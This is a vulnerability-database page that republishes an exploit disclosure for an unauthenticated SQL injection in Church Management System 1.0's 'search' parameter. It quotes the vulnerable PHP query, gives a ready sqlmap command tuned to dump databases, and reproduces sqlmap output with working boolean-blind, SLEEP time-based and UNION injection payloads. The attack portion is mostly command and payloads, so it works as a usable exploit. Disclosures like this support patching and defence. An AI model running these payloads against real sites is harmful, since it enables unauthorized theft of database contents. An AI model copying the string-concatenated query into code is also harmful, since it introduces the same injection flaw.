Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Church Management System 1.0 SQL Injection

🗓️ 20 Sep 2021 00:00:00Reported by Erwin KrazekType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 274 Views

Church Management System 1.0 SQL Injection unauthenticated vulnerability allows remote attackers to perform SQL injection attack to dump the SQL database

Code
`# Exploit Title: Church Management System 1.0 - 'search' SQL Injection (Unauthenticated)  
# Exploit Author: Erwin Krazek (Nero)  
# Date: 17/09/2021  
# Vendor Homepage: https://www.sourcecodester.com/php/14949/church-management-system-cms-website-using-php-source-code.html  
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/church_management_1.zip  
# Vendor: oretnom23  
# Version: v1.0  
# Tested on: Linux, Apache, Mysql  
# Exploit Description:  
Church Management System 1.0 suffers from an unauthenticated SQL Injection Vulnerability in 'search' parameter allowing remote attackers to dump the SQL database using SQL Injection attack.  
  
# Vulnerable Code  
In search.php on line 28  
$count_all = $conn->query("SELECT b.*,concat(u.firstname,' ',u.lastname) as author FROM `blogs` b inner join `users` u on b.author_id = u.id where b.`status` =1 and (b.`title` LIKE '%{$_GET['search']}%' OR b.`meta_description` LIKE '%{$_GET['search']}%' OR b.`keywords` LIKE '%{$_GET['search']}%' OR b.`content` LIKE '%{$_GET['search']}%' )")->num_rows;  
  
Sqlmap command:  
sqlmap -u 'http://localhost/church_management/?p=search&search=abcsw' -p search --level=5 --risk=3 --dbs --random-agent --eta --batch  
  
Output:  
---  
Parameter: search (GET)  
Type: boolean-based blind  
Title: OR boolean-based blind - WHERE or HAVING clause (NOT)  
Payload: p=search&search=abcsw') OR NOT 4306=4306-- rFTu  
  
Type: time-based blind  
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)  
Payload: p=search&search=abcsw') AND (SELECT 7513 FROM (SELECT(SLEEP(5)))SsaK)-- zpac  
  
Type: UNION query  
Title: Generic UNION query (NULL) - 14 columns  
Payload: p=search&search=abcsw') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x71766a7671,0x456e6d5461414774466e62636744424f786d74596e6270647a7063425669697970744a5351707970,0x7178787671),NULL,NULL,NULL,NULL-- -  
---  
[17:33:38] [INFO] the back-end DBMS is MySQL  
web server operating system: Linux Debian  
web application technology: Apache 2.4.46, PHP  
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)  
[17:33:38] [INFO] fetching database names  
available databases [4]:  
[*] church_db  
[*] information_schema  
[*] mysql  
[*] performance_schema  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
20 Sep 2021 00:00Current
0.2Low risk
Vulners AI Score0.2
sql injectionunauthenticatedremote attackersvulnerabilitychurch management system
274